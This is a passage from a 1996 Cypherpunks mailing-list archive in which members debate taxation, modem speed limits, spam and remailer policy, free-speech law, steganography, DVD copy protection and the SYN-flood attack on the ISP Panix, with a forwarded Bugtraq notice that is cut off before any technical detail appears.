while we could have, eh? If I were an unskilled person I would rather live in one of these countries where I would be paid approximately the same for doing nothing as for selling burgers at Mac Donalds. The low rate of unemployment in the US is partly due to the creation of service jobs with a salary that would be 'illegal' according to European union agreements. Now, the situation is that I have some wanted skills and pay a lot of taxes to support those who have none, and who are not permitted to work for lower than minimum wages. From a pure egotistical viewpoint I really should join the present calls for, as the debate goes here in Sweden, transforming the enemployed into 'maids and servants'. But I don't. I think it would backlash; the 'lower classes' would come back at us and cut our throats eventually (say, when 70% are serving the remaining 30%). With the present rate of increase in world population the planet will go to hell anyway. But suppose the population problem could be fixed. Then, with technology escalating towards singularity, machines doing almost all labor, there could certainly exist a system where the 'dumb' and 'lazy' could be fed and housed properly without anybody complaining. Those who want to become maids and servants for some extra pocket money, well, good luck to them. But to force people into menial service jobs just to literally survive is not to my taste. No, give them minimal shelter for nothing and from there on let the market anarcho-capitalistic struggle begin, for obtaining a higher than minimum material standard or reputational standing. But I get as angry as any libertarian when my tax money goes to subsidizing obsolete eduction, 'culture' and endless hordes of bureaucrats, when all we need is some basic police, courts and the Minimal Ministry for Collection of Taxes (probably based on production of some physical goods rather than income) for Redistribution to the Police, Courts and Everyone - yes, of course everyone should receive the minimal support-without- work and be able to rise from there. Asgaard P.S. Mac Donalds could easily be replaced by a bot. From tcmay at got.net Fri Sep 13 15:26:33 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 14 Sep 1996 06:26:33 +0800 Subject: 56 kbps modems Message-ID: At 3:24 PM 9/13/96, Enzo Michelangeli wrote: >On Fri, 13 Sep 1996, Asgaard wrote: > >> >U.S. Robotics and Rockwell International are planning new modems with >> >speeds up to 56 kbps a second, almost double the speed of the fastest >> >rate now available. The new devices should be available by the end of >> >the year, although their top speed initially may be less than 56 kbps. >> >(Wall Street Journal 12 Sep 96 B11) >> >> People who seemed to know used to say that 'the Shannon limit' >> set an absolute upper limit around 40 kbps. Has Shannon been >> proven wrong, or what? > >Well, it all depends on the signal-to-noise ratio. Also, if the noise is >not white gaussian the situation can be even better. No, this is not what's important in this case. (Besides, the "upper limit" is really more about the Nyquist Limit. Shannon's Theorem says that even in the presence of noise, this limit can be approached if proper coding schemes and whatnot are used.) While it is true that a noisy channel can reduce the effective channel capacity to something less than its capacity (for some particular coding scheme), the upper limit on channel capacity is whatever it is. As to the original question about modems and 40 kbps vs. 56 kpbs rates, this depends on "tricks" involving definitions of a "symbol" (a la the familiar argument about baud vs. bits per second). "Trellis coding," for example. I'm not a modem designer, but I'm not surprised to see these incremental improvements...none involve huge gains, and none involve getting, say, a megabit per second through a 6 kHz (or whatever) audio line--now that _would_ violate Shannon's Theorem, the Nyquist Limit, etc. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Fri Sep 13 16:14:14 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Sat, 14 Sep 1996 07:14:14 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW Message-ID: <199609131832.OAA17532@attrh1.attrh.att.com> At 03:58 PM 9/12/96 -0400, Robert Hettinga wrote: >I think someone should just stand right up and accuse the NSA, at the >behest of the Whitehouse, of running a denial of service attack on Panix at >*exactly* the time when VTW is lobbying its hardest on the PRO-CODE bill. Let's see, anon.penet.fi gets shut down (Church of Scientology), PRO-Code bill is being lobbied for and against, PANIX is attacked by TCP-spammers, HipCrime initiates a distributed spam against remailers, newspapers accuse remailers of promoting Child Pornography Louis Freeh's recently gotten wiretap money approved. Clipper-3 is trying to build an escrowed key-certification hierarchy Could it be *conspiracy*? Yah, sure. But it could be just a bunch of separate people who don't like anonymity. (Kind of like somebody getting stabbed twelve times at night on the Orient Express - the problem is finding someone who _doesn't_ have a motivation to attack anonymity :-) At least one of the newspaper articles I've read has referred to the need for real authentication on the net to prevent the anonymity that makes this kind of attack possible, and in particular for the major network providers to make sure that they don't export messages with bogus addressing, a cure that the article said would take several months to deploy. I don't know if they were referring to IPv6, or sendmail modifications, or router hacks, or what; the article's author seemed to think this was about bogusly-addressed email messages rather than understanding SYNs. Anybody for an Internet Driver's License? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Dispel Authority! From rjj at medialab.com Fri Sep 13 16:14:35 1996 From: rjj at medialab.com (Richard Johnson) Date: Sat, 14 Sep 1996 07:14:35 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: At 19:02 9/12/96, Ross Wright wrote to cypherpunks at toad.com and remailer-operators at c2.org and...: >On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote: >> However, since others may think like you, I guess I'll have to add a line >> above my link stating that email not related to the purpose of my site >> will be happily proof-read at the rate of $200 per hour, > >Just great. That sure takes away any anonymity you had about being >"on the cutting edge" of the information age. That 1952 "proof-read" >crap went out in the 70's. How can you hope to enforce it? It's a >joke, right? :) Maybe not, since it's on your sig-line. Hey, that was my too-long sig, Ross. There is obviously more than one person who disagrees with your assertion that listing an email address somewhere is an open invitation for mail to that address on any topic or for any purpose. Also, I charge $500 per message. I've always liked flat fees. :-) ------- Forwarded Message ------- At 21:50 9/11/96, Ross Wright wrote to cypherpunks at toad.com and remailer-operators at c2.org: >As I said having a website invites comments. It's like being a >public figure. In effect you are publishing your e-mail address. Interesting perspective. However, placing an email address on a web page is by no means an offer to take "comments" (i.e., marketing spams) on anything that strikes the spammer's fancy. The context in which any email address is mentioned will tell you what sorts of messages are expected at that address. To maintain otherwise is just a flimsy excuse for "seedy low life multi-level-marketing jerks" who want to cover their postage-due unsolicited advertising/promotional email in some false cloak of respectability. To continue the comment box analogy, the stuffing of salsa sample comment boxes (next to the salsa sample booth in the grocery store) with ads for anything you're pushing is most decidedly not what the comment box is for. ... -- "As the most participatory form of mass speech yet developed, the Internet deserves the highest protection from governmental intrusion. ... Just as the strength of the Internet is chaos, so the strength of our liberty depends upon the chaos and cacophony of the unfettered speech the First Amendment protects." -- Judge Stewart Dalzell Unsolicited advertising/promotional email proofread for $500/message! Your sending such a message to me is an explicit request for my services! From gbroiles at netbox.com Fri Sep 13 16:16:25 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Sat, 14 Sep 1996 07:16:25 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net Message-ID: <2.2.32.19960913185159.00733374@pop.ricochet.net> At 09:23 AM 9/13/96 -0400, Brian Davis wrote: >On Thu, 12 Sep 1996, jim bell wrote: > >> At 05:40 PM 9/12/96 -0700, Greg Broiles wrote: >> ... >> >Kozinski also suggested that computer-generated or morphed images of >> >children involved in sexual acts may not be protected under the Constitution >> >because of ongoing trauma to the child, >> >> Which child? Does he understand what "computer-generated" means? >> > >Yes, he does, I think. But I think "protected" above should read >"prohibited." [Note to Greg: could that be a typo?] The key kiddie >porn/1st amendment case (whose name escapes >me for the moment) offered two reasons why kiddie porn could be regulated >in the face of the first amendment. One reason was the "on-going trauma to >the child [victim]."In a morphed image, they is not (or at least may not be) >an actual child victim. Thus the "continuing trauma" rationale for >regulation does not exist in that case. This is what the article says: "Another freedom-of-speech-related concern may be that while computer-generated or 'morphed' Internet images of consenting adults in sexual acts may find constitutional protections, the same may not hold if such images use the likeness of a child because of ongoing trauma to the child, Kozinski says." The only way this makes sense to me is that a child might be horrified to find their face pasted onto the body of a 20-year old involved in sexual activity. But this doesn't seem like a problem for criminal law to solve, it seems like a tort law problem, and I'm still inclined to think that the First amendment protects speech which upsets or horrifies someone. The other rationale I see is the "child porn makes susceptible people go molest children" argument. (And the consequently molested child would then endure ongoing trauma.) The only difference I see between this argument and the argument (which has been rejected in U.S. courts, as far as I know) that adult porn makes susceptible people hurt women is the changing focus from "woman" to "child". But I don't see a big difference between ongoing trauma in adults and ongoing trauma in children, such that one merits special restrictions on otherwise protected speech and one does not. But maybe that's why I'm studying for the bar and Alex Kozinski is on the 9th circuit. :) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 13 16:43:06 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 14 Sep 1996 07:43:06 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: <01I9FNB4810G9ULP6J@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 13-SEP-1996 04:33:21.66 >By the way, today's remailers appear to be primarily _experiments_ or >_casual services_, not altruistic services for some nebulous idea of "free >speech." (Besides, if it's illegal for "spammers" to use remailers, so much >for "free speech.") Umm.... freedom of the press is freedom for he who owns the press. The remailer operators own the presses; why shouldn't they use whatever means they see fit to determine how they can be used? I encourage people not to discriminate on the basis of the political orientation of what's going through... but spam isn't political speech. (I agree that the government should not be in the business of determining what is spam and what is political speech - all speech should be protected - but remailer operators are not governments.) -Allen From admin at superhot.com Fri Sep 13 16:47:33 1996 From: admin at superhot.com (Admin) Date: Sat, 14 Sep 1996 07:47:33 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <199609131941.NAA15578@rintintin.Colorado.EDU> At 12:21 PM 9/13/96 -0600, you wrote: >At 19:02 9/12/96, Ross Wright wrote to cypherpunks at toad.com and >remailer-operators at c2.org and...: >>On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote: >>> However, since others may think like you, I guess I'll have to add a line >>> above my link stating that email not related to the purpose of my site >>> will be happily proof-read at the rate of $200 per hour, >> >>Just great. That sure takes away any anonymity you had about being >>"on the cutting edge" of the information age. That 1952 "proof-read" >>crap went out in the 70's. How can you hope to enforce it? It's a >>joke, right? :) Maybe not, since it's on your sig-line. > > >Hey, that was my too-long sig, Ross. There is obviously more than one >person who disagrees with your assertion that listing an email address >somewhere is an open invitation for mail to that address on any topic or >for any purpose. > >Also, I charge $500 per message. I've always liked flat fees. :-) > >------- Forwarded Message ------- >At 21:50 9/11/96, Ross Wright wrote to >cypherpunks at toad.com and remailer-operators at c2.org: >>As I said having a website invites comments. It's like being a >>public figure. In effect you are publishing your e-mail address. > > >Interesting perspective. However, placing an email address on a web page >is by no means an offer to take "comments" (i.e., marketing spams) on >anything that strikes the spammer's fancy. How would you know what the *intent* of these other people is in placing mailme: tags on their public pages unless you have been to the specific pages. You speak only for yourself, yet you try to imply that you speak for everyone on the www who has placed a mailto: tag on their pages. > >The context in which any email address is mentioned will tell you what >sorts of messages are expected at that address. Would it make a difference if the message to the webmasters mailto: buttons said "Nice webpages you have, when you get a moment check out my designs". Remember the thread is about an Artist who sent out only his URL to encourage visitors. This is and was a NON commercial site. >To maintain otherwise is >just a flimsy excuse for "seedy low life multi-level-marketing jerks" who >want to cover their postage-due unsolicited advertising/promotional email >in some false cloak of respectability. *Respectability* is subjective to the definer... > >To continue the comment box analogy, the stuffing of salsa sample comment >boxes (next to the salsa sample booth in the grocery store) with ads for >anything you're pushing is most decidedly not what the comment box is for. Without a disclaimer on the box stating specifically what cannot be placed in it there can be no knowing what the boxholder finds of personal interest... >-- >"As the most participatory form of mass speech yet developed, the Internet >deserves the highest protection from governmental intrusion. ... Just as the >strength of the Internet is chaos, so the strength of our liberty depends >upon the chaos and cacophony of the unfettered speech the First Amendment >protects." > -- Judge Stewart Dalzell > >Unsolicited advertising/promotional email proofread for $500/message! Your >sending such a message to me is an explicit request for my services! Inane, off-thread, unsupported weak analogous attempts at reasoned argument received, but not read - simply deleted, for $1000/message. Sending OR posting the above to me or a Newsgroup that I may happen to read constitutes your accord and acceptance of the above contract. If I must read them, the fee is $2000/message. admin <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9�/min |Helping hardworking people || ||9.9� Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From mpd at netcom.com Fri Sep 13 16:54:09 1996 From: mpd at netcom.com (Mike Duvos) Date: Sat, 14 Sep 1996 07:54:09 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609131832.OAA17532@attrh1.attrh.att.com> Message-ID: <199609132026.NAA15888@netcom9.netcom.com> Bill Stewart writes: > Anybody for an Internet Driver's License? At this point, I would love the ability to filter news and mail according to some criteria related to the sender's probable reputation. Back in the early days of C&S, spam was an intellectual issue. Now it is a good chunk of the entire bandwidth of major components of the Net. I am now getting more junk email than email from people I care to correspond with. It seems one can't even read the scholarly newsgroups anymore without "Come Watch Us Lick Ourselves on the Web" messages popping up regularly. It's really getting to the point where the time-honored suggestion of "just hit your delete key" cannot deal with the obverwhelming amount of Drek posted, much of it with subject lines deliberately designed to blend in with the newsgroup topic. Just being able to filter out posts from Net addresses that don't correspond to real identifiable humans posting under their legal names would be a good first step. Purely voluntary, of course, since any filtering would be done at the reading end, and people could still post anything they liked. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From tcmay at got.net Fri Sep 13 16:58:06 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 14 Sep 1996 07:58:06 +0800 Subject: Unrequested mail from Mr. Babayco Message-ID: At 8:24 PM 9/13/96, Z.B. wrote: >Even if you are serious about this, the fact that you signed up to a >mailing list entitles you to all of the messages that go over this list, >plus people's replies to your posts. The point of my original message >was that mail from a non-commercial individual, such as yourself or other >people on this list is welcomed, but mail from people trying to sell me >something is not. Perhaps I should have made that more clear in my >original post. And by having a public mailbox, you are in no position to say some entities cannot mail to you. While unwanted e-mail is bothersome, so are unwanted telephone calls, unwanted faxes, unwanted regular mail, unwanted conversations at parties, unwanted attention in general, and "unwanted unwanteds" in their most general form. But unless such unwanted things become frequent beyond some threshold (as repeated phone calls may be, or as "fax-bombing" can be, or as "stalking" situations occur, depending on various laws), the the law does not offer convenient solutions. Nor should we want the already overcrowded courts and jails clogged with "He sent me a message I didn't want!" whines. The solution is screening calls with an answering machine or using something like Caller ID to screen incoming calls, having an unlisted number, turning off a fax machine except when expecting a fax, using Eudora or procmail to filter messages. In other words, the equivalents of fences, locks, doors, gates, and other barriers. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Fri Sep 13 17:03:51 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 14 Sep 1996 08:03:51 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: At 7:03 PM 9/13/96, E. Allen Smith wrote: >From: IN%"tcmay at got.net" 13-SEP-1996 04:33:21.66 > >>By the way, today's remailers appear to be primarily _experiments_ or >>_casual services_, not altruistic services for some nebulous idea of "free >>speech." (Besides, if it's illegal for "spammers" to use remailers, so much >>for "free speech.") > > Umm.... freedom of the press is freedom for he who owns the press. >The remailer operators own the presses; why shouldn't they use whatever means >they see fit to determine how they can be used? I encourage people not to >discriminate on the basis of the political orientation of what's going >through... but spam isn't political speech. (I agree that the government >should not be in the business of determining what is spam and what is >political speech - all speech should be protected - but remailer operators >are not governments.) There are many nuanced definitions of "free speech." I was replying to someone who used in connection with his belief that remailers primarily exist as a service to enable "free speech." Hence my comment. I'm fully aware of the rights of remailers to limit what they pass on. I just don't think it wise, nor do I think it fits with pious calls for "free speech." --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jim at suite.suite.com Fri Sep 13 17:05:26 1996 From: jim at suite.suite.com (Jim Miller) Date: Sat, 14 Sep 1996 08:05:26 +0800 Subject: really (?) undetectable crypto Message-ID: <9609132008.AA08893@suite.com> > What about Walter making insignificant changes to the > cleartext and replacing the hash with the new hash? > Because you are using an unkeyed hash (and not a sig) he can > do that and foul up the stegomessage > > Walter can still play silly spooks with your stego if he breaks the > 40-bit encryption. True. The examples was just illustrative. Given unkeyed hashes or 40 bit encryption, Walter could also frame you by replacing your bits with ones that combine into a very incriminating encrypted message and then leaking the key. > The cyphertext/plaintext ratio looks like getting > really huge too. Your messages must all arrive, and > retain the right order. > Hey, I never claimed it was efficient. :-) Actually, the messages don't have to arrive in order. The correct order can be discovered by trial and error (e.g. does this combination decrypt into something readable? No. How about this one?). Depending on the cryptographic protocol, there may be other, more efficient means for sending hidden encrypted messages. If, for example, a protocol requires a cryptographically random confounder to be appended to the front of the plaintext before encryption, you could use chunks of you secret encrypted message for the entire confounder. Jim_Miller at suite.com From tcmay at got.net Fri Sep 13 17:11:53 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 14 Sep 1996 08:11:53 +0800 Subject: Workers Paradise. /Political rant. Message-ID: At 5:06 PM 9/13/96, Asgaard wrote: >From a >pure egotistical viewpoint I really should join the present calls >for, as the debate goes here in Sweden, transforming the enemployed >into 'maids and servants'. But I don't. I think it would backlash; >the 'lower classes' would come back at us and cut our throats >eventually (say, when 70% are serving the remaining 30%). The 70% already _are_ cutting the throats of the other 30%. It's called a 60%+ tax rate. This is the sum of: federal income tax, state income tax, city tax, sales tax, gas tax, energy tax, property tax, entertainment tax, special excise taxes on alcohol, cigarettes, etc., and miscellaneous other taxes tacked on...not to mention the "double taxation" of certain forms of income--every dollar Intel earns is taxed first at 48% by the Feds and the State of California, then what's left is taxed at 35-40% when it reaches the owners of the company. (Oh, and buyers of PCs containing Intel chips pay 8.25% for the privilege of buying the PC.) The masses have realized, as De Tocqueville predicted 150 years ago, that they can use the democratic process to pick the pockets of others. This is why I have no faith in "democracy," and consider crypto anarchy to be the best way to undermine this flawed system. >With the present rate of increase in world population the planet >will go to hell anyway. But suppose the population problem could >be fixed. Then, with technology escalating towards singularity, Cf. what sociologists call "the demographic transition." Countries that value learning and wealth are _not_ facing a population problem. In fact, many such countries are now at "below replacement" birth levels. >machines doing almost all labor, there could certainly exist a >system where the 'dumb' and 'lazy' could be fed and housed properly >without anybody complaining. Those who want to become maids and >servants for some extra pocket money, well, good luck to them. One need not wait for this fanciful "singularity"--by any reasonable standards of providing minimal food and minimal shelter, the unemployed poor of today are receiving this. Ask a peasant of, say, 18th century Europe if he'd consider himself sheltered and fed if he could have an apartment in a building, a microwave oven, a television, a MacDonald's nearby, and enough extra spending money for some beer. I predict that "the masses fed by the nanotechnological singularity" will be just as likely to riot and burn down their own neighborhoods as the "masses fed by industrialization and distribution" are prone to do today. (The point being that people want more than "basic food and shelter," but are often unwilling to make the commitments and sacrifices in their lives to gain the wherewithal to earn significant salaries.) >But to force people into menial service jobs just to literally >survive is not to my taste. No, give them minimal shelter for >nothing and from there on let the market anarcho-capitalistic >struggle begin, for obtaining a higher than minimum material >standard or reputational standing. There is a basic error here, one that I see often. Who says that the "anarcho-capitalists" will freely give away, say, some vast fraction of their profits so as to subsidize the overall society? Any more so than the owners of flour mills and computer chip companies give away 99% of their profits. And crypto anarchy means it will not be clear who is making what, who is generating what income, and where it is located. And the producers of wealth will be able to move accounts, resources, and even factories around the world. If one jurisdiction socks them with exorbitant taxes (which may be anything more than a nearly ignorable 10% overall tax), they can move. Regulatory arbitrage strikes again. Ask your fellow Swedes about the drain of talent out of Sweden in the 60s and 70s...the flight of Bergmann, actors and actresses, corporations, and even ABBA. (Though I understand most of ABBA moved back to Sweden and is now chummy with the Queen.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From alano at teleport.com Fri Sep 13 17:17:55 1996 From: alano at teleport.com (Alan Olsen) Date: Sat, 14 Sep 1996 08:17:55 +0800 Subject: What is this nonsense? (Anti DVD piracy chip) Message-ID: <3.0b15.32.19960913112614.00b0da58@mail.teleport.com> At 02:16 PM 9/13/96 +0200, Gary Howland wrote: >Taken from a recent Edupage: > >> SGS-THOMSON TAKES AIM AT DVD PIRACY >> SGS-Thomson Microelectronics has developed a computer chip that prevents >> would-be DVD pirates from making unlawful copies of movies from digital >> video disc players. The chip scrambles the disk's coding if it's duplicated >> on a VCR. (Investor's Business Daily 11 Sep 96 A6) > >Anyone know anything about this? Sounds like nonsense to me ... Probibly a variation on the Macrovision copy protection scheme. Of course they do not care that such copyprotection methods usually cause a loss in signal quality. (Which is why people buy laser discs in the first place.) Hopefully it will be something that never succeeds in the marketplace. (Although i expect it to be imposed whether the consumer wants it or not or how bad it screws up the signal.) --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From liberty at gate.net Fri Sep 13 17:20:22 1996 From: liberty at gate.net (Jim Ray) Date: Sat, 14 Sep 1996 08:20:22 +0800 Subject: did you go to school? Message-ID: <199609132109.RAA31614@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: robert at precipice.v-site.net, cypherpunks at toad.com, remailer-operators at c2.org Date: Fri Sep 13 17:07:32 1996 "Hipcrime" Detweilled: ... > JMR, it's hard to believe that your English education is SO LACKING, > that you missed the fact, that in my sentence quoted above, the word > "ours" refers to MANKIND IN GENERAL, not me personally. > > Go sit in the corner with the duncecap on, and don't come out until you > can read an 8th grade piece of literature (with full comprehension). > [This doesn't deserve comment, and I have already killfiled this asshole-liar-who-is-unable-to-admit-when-he's-wrong, but...] 1. Go run a remailer if you proclaim that you like them so much. 2. Private property that belongs to "mankind in general"? A new one on me. Webster's may help you understand English, but your debate skills are akin to your personality, and yes, once again, that was private email. JMR -- "who is beginning to get used to this from the net.jerk population. Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjnNGm1lp8bpvW01AQFp/AP/UlGf+g56m/KjFOV6sTvD0+xTrAoQ9WFp TThhZ9OLgQ2FQqEBJZ/vfGSUf7OxpYd5Q8cynLsnRXvH+9+z0XpzStC8KYyCuv5E VFu10VeTs4egEX3dy6JSmFgZehJxDNsu/nVceTLmVX54JC+qMJ8hC7PPRZtvrSCy LU8E9pWJMEY= =8Cyf -----END PGP SIGNATURE----- From zachb at netcom.com Fri Sep 13 17:22:54 1996 From: zachb at netcom.com (Z.B.) Date: Sat, 14 Sep 1996 08:22:54 +0800 Subject: Unrequested mail from Mr. Babayco In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Timothy C. May wrote: > At 4:28 AM 9/13/96, Z.B. wrote: > [snip] > > > Mr. Babayco, > > I did not request your mail to me, and I am annoyed at having received it. > > I am not interested in the views you are advertising or selling, and I'd > prefer that you not mail me. > > To make me whole, I demand that you send me $125 for this occurrence, and > $125 for each future occurrence. > > Have a nice day. > > --Timothy C. May Very well then, Mr. May. I did not request YOUR mail EITHER, so I demand that you send ME $250 for receipt of this message, and $250 for each additional message I receive from you. I also demand that you send me $10,000 for taking up my valuable time with this message, and $5,000 for network access fees. Have a nice day! Even if you are serious about this, the fact that you signed up to a mailing list entitles you to all of the messages that go over this list, plus people's replies to your posts. The point of my original message was that mail from a non-commercial individual, such as yourself or other people on this list is welcomed, but mail from people trying to sell me something is not. Perhaps I should have made that more clear in my original post. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From markm at voicenet.com Fri Sep 13 17:28:05 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 14 Sep 1996 08:28:05 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <199609122357.QAA24466@adnetsol.adnetsol.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 12 Sep 1996, Ross Wright wrote: > On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote: > > > > > > > These people have invited the email, and the associated expense, > > > by placing > > > a public email-to: button on their public www page. > > Correct! By sending me unsolicited mail, you have invited the associated expense of having every recipient bounce the message back to you (maybe sending a courtesy copy to your postmaster). If you don't want to wade through 20 megs of mail in one day, don't send unsolicited email. I hardly consider this abuse. If you have no ethical problem with sending people unsolicited junk to me, I have no problem sending it right back to you indicating that I don't appreciate the email. Sounds fair to me. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMjm43SzIPc7jvyFpAQHf/Qf/Y0r/pY3YAbW9RVw93ICX2Wk3/CepACBf QHgw81+SWyes1d0QASR+Kp5bPTg3k6ZqiaqgZrZ7S/fN8h4p/Vb/md7ace6v90AM Is+JU7cvntMa5NbbHSGKZD5noOllNodviLXMw0O+vgr1zv9vYTCJvE2KBwykmzVf T3Sv5nKlsHAp2zK/aSZPPMqiq5pKQUZT2WlooviSsqCT6TAGLKJLpeQHufywNfM5 TYwY8g8Fd354h4Sa0nQS/a/IbDtpracr0K5eL7rVLyMNlTD8P17IOM1sdSL3ss38 0yt7WPv56xdkP3G8LvUeXAWUbsPUrAEjAT9gyklGMK89WxWcNnnOog== =ILRH -----END PGP SIGNATURE----- From alano at teleport.com Fri Sep 13 17:37:37 1996 From: alano at teleport.com (Alan Olsen) Date: Sat, 14 Sep 1996 08:37:37 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <3.0b15.32.19960913111921.00b03180@mail.teleport.com> At 10:13 AM 9/13/96 -0400, pjb at ny.ubs.com wrote: >> "As to who might be targeting Panix, the firm's Mr. Rosen speculated it > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > >It could, of course, also be someone, from a set of several million, that >find Mr. Rosen to be such as odious prick that they did it just to drive him >out of their misery. Just thinking out loud.. Or it could be any of the readers of 2600 (which published an article on SYN floods in the last issue). --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From mycroft at datasphere.net Fri Sep 13 17:41:51 1996 From: mycroft at datasphere.net (Mycroft) Date: Sat, 14 Sep 1996 08:41:51 +0800 Subject: Forwarded message from Christopher Klaus (SYN Flooding [info]) Message-ID: <199609132117.OAA05315@chrome.DataSphere.NeT> ------- start of forwarded message (RFC 934 encapsulation) ------- Content-Length: 3804 Return-Path: owner-bugtraq at NETSPACE.ORG Received: from brimstone.netspace.org ([128.148.157.143]) by chrome.DataSphere.NeT (8.7.5/8.7.3) with ESMTP id NAA05258 for ; Fri, 13 Sep 1996 13:20:11 -0700 (PDT) Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <24730-24839>; Fri, 13 Sep 1996 14:27:52 -0500 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id OAA28644; Fri, 13 Sep 1996 14:27:19 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 397572 for BUGTRAQ at NETSPACE.ORG; Fri, 13 Sep 1996 14:23:31 -0400 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id OAA27584 for ; Fri, 13 Sep 1996 14:19:44 -0400 Approved-By: ALEPH1 at UNDERGROUND.ORG Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by netspace.org (8.7/8.6.12) with SMTP id LAA05934 for ; Fri, 13 Sep 1996 11:02:26 -0400 Received: (from cklaus at localhost) by phoenix.iss.net (8.6.13/8.6.12) id KAA06507 for bugtraq at netspace.org; Fri, 13 Sep 1996 10:58:24 -0400 X-Mailer: ELM [version 2.4 PL24 PGP2] Content-Type: text Approved-By: Christopher Klaus Message-ID: <199609131458.KAA06507 at phoenix.iss.net> Reply-To: Christopher Klaus From: Christopher Klaus Sender: Bugtraq List To: Multiple recipients of list BUGTRAQ Subject: SYN Flooding [info] Date: Fri, 13 Sep 1996 10:58:24 -0400 [Below we have a software tool that will recognize SYN floods and correct the problem.] Possible solution to SYN Flooding attacks The attack is on! Both 2600 and Phrack, 2 of the biggest well-known underground hacking magazines, have posted exploit code to do one of the nastiest denial of service attacks that the Internet has seen so far. Hundreds of people have access to these programs to bring down services on the Internet. Many of these people are targeting their attacks at various organizations such as ISP. Panix, an ISP, has been under attack for quite a few days now and they have not 